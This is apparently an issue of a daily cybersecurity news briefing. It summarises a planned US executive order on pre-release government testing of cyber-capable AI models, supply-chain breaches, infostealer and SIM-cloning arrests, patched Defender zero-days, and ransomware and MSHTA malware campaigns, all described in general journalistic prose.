Trump prepares to sign AI cyber order today amid Mythos alarm

Metacurity is the only daily cybersecurity briefing built for clarity, not agendas—no vendor spin, no echo chamber, just sharp, original aggregation and analysis of what actually matters to security leaders.

If you rely on Metacurity to cut through the noise on policy, industry shifts, and security research, consider supporting us with a paid subscription. Independent coverage like this only exists because readers decide it’s worth it.

The Trump administration is preparing to unveil a major new artificial intelligence and cybersecurity executive order at a White House ceremony today, which is expected to include some of the nation’s most powerful AI executives.

The order would create a broad voluntary framework allowing the federal government to test advanced AI systems before public release, particularly models capable of conducting sophisticated cybersecurity tasks such as identifying network vulnerabilities, assisting with exploit development, or accelerating cyber defense operations.

At the center of the administration’s urgency is Anthropic’s powerful new Mythos model, which triggered alarm across Washington after demonstrating an unprecedented ability to locate flaws in computer systems and critical infrastructure networks. The concerns deepened after OpenAI released GPT-5.5-Cyber, a similarly advanced cyber-focused model designed for defensive security operations.

Rather than imposing mandatory federal approval of advanced AI systems — something many Silicon Valley executives fiercely oppose — the draft order instead establishes what officials describe as a voluntary review structure. Developers would be encouraged to provide the government access to certain frontier models as much as 90 days before public deployment. Participating companies would also be asked to allow selected critical infrastructure organizations, including banks, utilities, and hospitals, to evaluate the systems before broader release.

The proposal reflects a dramatic evolution in the Trump administration's thinking on AI. Earlier in Trump’s second term, the White House aggressively emphasized deregulation and innovation, positioning itself against heavy-handed oversight of the technology. But the rapid emergence of frontier cyber-capable AI systems has intensified fears inside both the intelligence community and parts of Trump’s political coalition that the technology could outpace existing safeguards.

Some officials and industry allies pushed for a hands-off approach intended to preserve America’s competitive edge against China. Others argued the government needed far greater visibility into models that could potentially threaten financial systems, telecommunications networks, and national infrastructure.

The resulting executive order appears to divide responsibilities across a sprawling coalition of agencies. The Treasury Department would lead a voluntary vulnerability-sharing partnership between AI developers and critical infrastructure operators. The Cybersecurity and Infrastructure Security Agency, Office of the National Cyber Director, and National Security Agency would support the effort.

Meanwhile, the NSA is expected to assume perhaps the most sensitive role: conducting or overseeing classified evaluations of frontier AI systems before release.

The order reportedly directs agencies, including Treasury, CISA, and the National Institute of Standards and Technology, to establish a classified benchmarking process within 60 days to determine what qualifies as a “covered frontier model.” Final determinations would ultimately rest with the NSA in consultation with other agencies.

The administration also plans an aggressive timetable. The Pentagon would receive 30 days to secure telecommunications and information systems, while federal agencies would simultaneously push wider AI adoption across government operations and critical infrastructure sectors.

For now, the administration is framing the initiative as cooperative rather than coercive. But the order marks a clear acknowledgment that frontier AI is no longer viewed solely as a commercial technology race. (Jacob Wendler, Dana Nickel, Dasha Burns, and John Hewitt Jones / Politico, Maggie Eastland, Oma Seddiq (BGOV), and Courtney Subramanian / Bloomberg, Karen Freifeld, Courtney Rozen, and Jarrett Renshaw / Reuters, and Alexandra Kelley and David DiMolfetta / NextGov/FCW)

Related: CNN, The Information

Sources say the Pentagon’s cyber-warfighting arm, US Cyber Command, is launching a task force to speed up the adoption of cutting-edge artificial intelligence tools with powerful hacking capabilities.

The initiative from Cybercom underscores the Pentagon’s concerns about the sudden emergence of private sector-built AI models that can unearth security flaws in digital systems faster than the world’s best hackers.

The task force was announced to staff two weeks ago by Gen. Joshua Rudd, the dual-hat leader of the National Security Agency and Cyber Command, according to an internal email.

According to the email, the task force will span Cyber Command and the NSA, and will study how the Pentagon can safely deploy leading AI models in all aspects of its missions, the two people said. This includes assessing how AI models built by Silicon Valley tech giants can be used on “high-side” systems bearing some of the intelligence community’s most sensitive secrets. (John Sakellariadis, Maggie Miller, and Jacob Wendler / Politico)

Related: The Information

GitHub says the hackers who breached 3,800 internal repositories gained access via a malicious version of the Nx Console VS Code extension, compromised in last week's TanStack npm supply-chain attack.

This attack is attributed to the TeamPCP threat group and began with the compromise of dozens of TanStack and Mistral AI npm packages, then quickly extended to other projects (including UiPath, Guardrails AI, and OpenSearch) using stolen CI/CD credentials.

TeamPCP was linked to other major supply chain attacks targeting developer code platforms, including PyPI, NPM, GitHub, and Docker, and, more recently, to the "Mini Shai-Hulud" supply chain campaign (which also affected two OpenAI employees).

GitHub CISO Alexis Wales said the breach involved a malicious version of Nx Console, the official Visual Studio Code marketplace extension for Nx, that allows developers to manage large repos and multi-project codebases without relying entirely on complex Terminal CLI commands.

While GitHub has yet to attribute the attack to a specific hacking group or threat actor, the TeamPCP cybercrime gang claimed access to GitHub source code and "~4,000 repos of private code" on the Breached forum on Tuesday, and is now asking for at least $50,000 for the stolen data. (Sergiu Gatlan / Bleeping Computer)

Related: GitHub, Bleeping Computer, Grafana

The Ukrainian cyberpolice, working in conjunction with US law enforcement, has identified an 18-year-old man from Odesa suspected of running an infostealer malware operation targeting users of an online store in California.

According to the police, the threat actor used information-stealing malware between 2024 and 2025 to infect users’ devices and steal browser sessions and account credentials.

The attacks linked to the young hacker impacted 28,000 customer accounts, of which the cybercriminals used 5,800 to make unauthorized purchases totaling about $721,000. The malicious operation caused $250,000 in direct losses, including chargebacks.

“The information was then processed and sold through specialized online resources and Telegram bots.”

The police say the suspect engaged in cryptocurrency transactions with his accomplices. (Bill Toulas / Bleeping Computer)

Related: Cyberpolice.gov.ua, The Cyber Express

South Korean police announced they had apprehended an international hacking organization responsible for stealing financial and personal information from conglomerate chairpersons, BTS members, and others through SIM cloning and unauthorized activation of budget mobile carriers.

The group targeted wealthy individuals with assets ranging from hundreds of billions to trillions of Korean won, extorting 48.4 billion won from 28 victims. The two Chinese masterminds were arrested in Thailand and extradited to South Korea for detention, with most of the organization’s members also captured.

The Seoul Metropolitan Police Agency’s cyber investigation team stated, “From May 2022 to April of last year, we arrested 32 members of an international hacking group that hacked multiple government, public, and private websites to steal financial and personal data and embezzle assets.” Ten key members, including the two leaders, A and B, were indicted or are set for indictment.

The group specifically targeted BTS’s Jung Kook, chairpersons and executives of top 100 conglomerates, and wealthy individuals residing overseas, recently deceased, or imprisoned. They exploited the difficulty these victims faced in responding immediately to breaches in non-face-to-face authentication systems. (Bang Geuk-ryeol / The Chosun Daily)

Related: Chosun Biz, Maeil Business

Microsoft started rolling out security patches for two Defender vulnerabilities that have been exploited in zero-day attacks.

The first one, tracked as CVE-2026-41091, is a privilege escalation security flaw affecting Microsoft Malware Protection Engine 1.1.26030.3008 and earlier, which provides the scanning, detection, and cleaning capabilities for Microsoft antivirus and antispyware software.

This flaw stems from an improper link resolution before file access (link following) weakness, which allows attackers to gain SYSTEM privileges.

A second vulnerability (CVE-2026-45498) affects systems running the Microsoft Defender Antimalware Platform 4.18.26030.3011 and earlier, a collection of security tools also used by Microsoft's System Center Endpoint Protection, System Center 2012 R2 Endpoint Protection, System Center 2012 Endpoint Protection, and Security Essentials.

According to Microsoft, successful exploitation enables threat actors to trigger denial-of-service (DoS) states on unpatched Windows devices.

Related: Help Net Security, HKCERT

Researchers at ReliaQuest report that threat actors brute-forced VPN credentials and bypassed multi-factor authentication (MFA) on SonicWall Gen6 SSL-VPN appliances to deploy tools used in ransomware attacks.

During the intrusions, the hacker took between 30 and 60 minutes to log in, do network reconnaissance, test credential reuse on internal systems, and log out.

SonicWall warned in a security advisory for CVE-2024-12802 that installing the firmware update alone on Gen6 devices does not fully mitigate the vulnerability, and a manual reconfiguration of the LDAP server is required. Failing to do so leaves open the possibility of bypassing MFA protection.

The researchers noted that, in the environments they investigated, the devices appeared to be patched because they were running the updated firmware, yet they remained vulnerable because the required remediation steps had not been completed.

ReliaQuest says that in one incident, the hacker gained access to the internal network and reached a domain-joined file server in as little as half an hour. Then they established a remote connection over RDP using a shared local administrator password.

The researchers found that the attacker tried to deploy a Cobalt Strike beacon, a post-exploitation framework for command-and-control (C2) communication, and a vulnerable driver, likely to disable endpoint protection using the Bring Your Own Vulnerable Driver (BYOVD) technique.

However, the installed endpoint detection and response (EDR) solution blocked the beacon and the loading of the driver. (Bill Toulas / Bleeping Computer)

Related: ReliaQuest, CyberPress, SonicWall

Sophos researchers observed a new ransomware variant called WantToCry, which, thanks to its encryption mechanism, is a lot more difficult to spot than traditional encryptors.

Sophos said the attackers would first use scanners such as Shodan or Censys to look for internet-connected devices using the Server Message Block (SMB) service.

SMB is a network file-sharing protocol that lets computers access files and other resources over a local network as if they were on their own system. It is widely used in Microsoft Windows environments to enable shared drives and network authentication, and allows applications to manipulate files on remote servers.

After finding SMB services with open TCP ports 139 and 445, they would try default, frequently used, and otherwise weak credentials until they worked and granted access.

However, once inside, WantToCry doesn’t do what encryptors usually do and lock down files locally. Instead, they first exfiltrate them and do the encryption part on a remote server. After that, they would redeploy the encrypted files back to the victim devices, overwriting them and rendering them useless sans the decryption key. (Sead Fadilpašić / TechRadar)

Related: Sophos, SC Media, Cyber Press

Researchers at Bitdefender have, since the start of this year, detected a dramatic rise in malicious activity related to MSHTA (Microsoft HTML Application).

One common use involved the use of the HTA CountLoader to deliver the Lumma and Amatera stealers. In one Lumma campaign, victims were targeted through messages, social media posts, or SEO-poisoned websites that promise free or cracked software.

If successfully phished, the victim would execute a setup file, which is really a Python interpreter, and load Python runtime. The downloaded ‘free software’ archive includes all the necessary scripts together with an MSHTA executable to contact the attacker’s C2 and retrieve the HTA loader.

The HTA then decodes the next payload and launches it. This downloads and executes the stealer.

The Emmenhtal loader was also observed in delivering Lumma and other stealers. This campaign started with phishing messages via Discord. The victim is tricked into visiting a page designed to hijack the clipboard and trick the user into executing a malicious command line as part of a fake human verification process. If the user is subsequently further tricked into pressing Win + R to open the Run dialog, followed by Ctrl + V and Enter to paste and execute the command, then explorer.exe seems to launch MSHTA legitimately.

Other MSHTA-driven campaigns have included the delivery of ClipBanker and PurpleFox. ClipBanker is a malware family primarily designed to replace wallet addresses in the clipboard to steal cryptocurrency. “In this infection chain, MSHTA is used as an early-stage execution mechanism that launches a remote HTA and quickly transitions to PowerShell-based persistence and payload delivery,” explains Bitdefender.

PurpleFox is a more advanced and persistent malware family that has been active since 2018. “One of its long-standing delivery methods, however, has remained consistent: launching msiexec from an MSHTA command line in order to download and execute an MSI package disguised as a .png file,” says Bitdefender. (Kevin Townsend / Security Week)

Related: Bitdefender, Cyber Press, GBHackers, TechRadar

Team Europe notched its fifth first-place win at this year's International Cybersecurity Challenge, which was hosted in Brisbane, Australia.

Team USA came in second, while Team Oceania secured the third-place win.

As a global Capture the Flag event (CTF), the International Cybersecurity Challenge (ICC) is designed to encourage the development of cybersecurity skills and to foster international cooperation. The format of the event, with teams made up of nationalities from all over the world, allows team members to experience cultural differences and learn how to still be able to efficiently cooperate to achieve their goals.

The ICC was originally launched and led by the European Union Agency for Cybersecurity (ENISA) in 2022. (ENISA)

Related: ABC.net.au, MediaNet

Socket Security raised $60 million in a Series C venture funding round.

Thrive Capital led the round with participation from Andreessen Horowitz, Abstract Ventures, and Capital One Ventures. (Dina Bass / Bloomberg)

Related: Socket

Best Thing of the Day: Bit by Bit, Step by Step

As tensions between Donald Trump and Europe continue to simmer, the continent is accelerating its moves to reduce its addiction to US technology.

Bonus Best Thing of the Day: Not That Musk Cares, But It's Still a Victory

An Australian court upheld ​a regulator's fine against Elon Musk's social media company X Corp ‌after it admitted violating the law by failing to supply information about its online child protection measures, ending a nearly three-year dispute.

Worst Thing of the Day: The World's Second-Worst Person Will Likely Become the World's First Trillionaire

Elon Musk has the potential to become the world's first trillionaire now that  SpaceX, which also owns Starlink and xAI, has filed to go public.

Closing Thought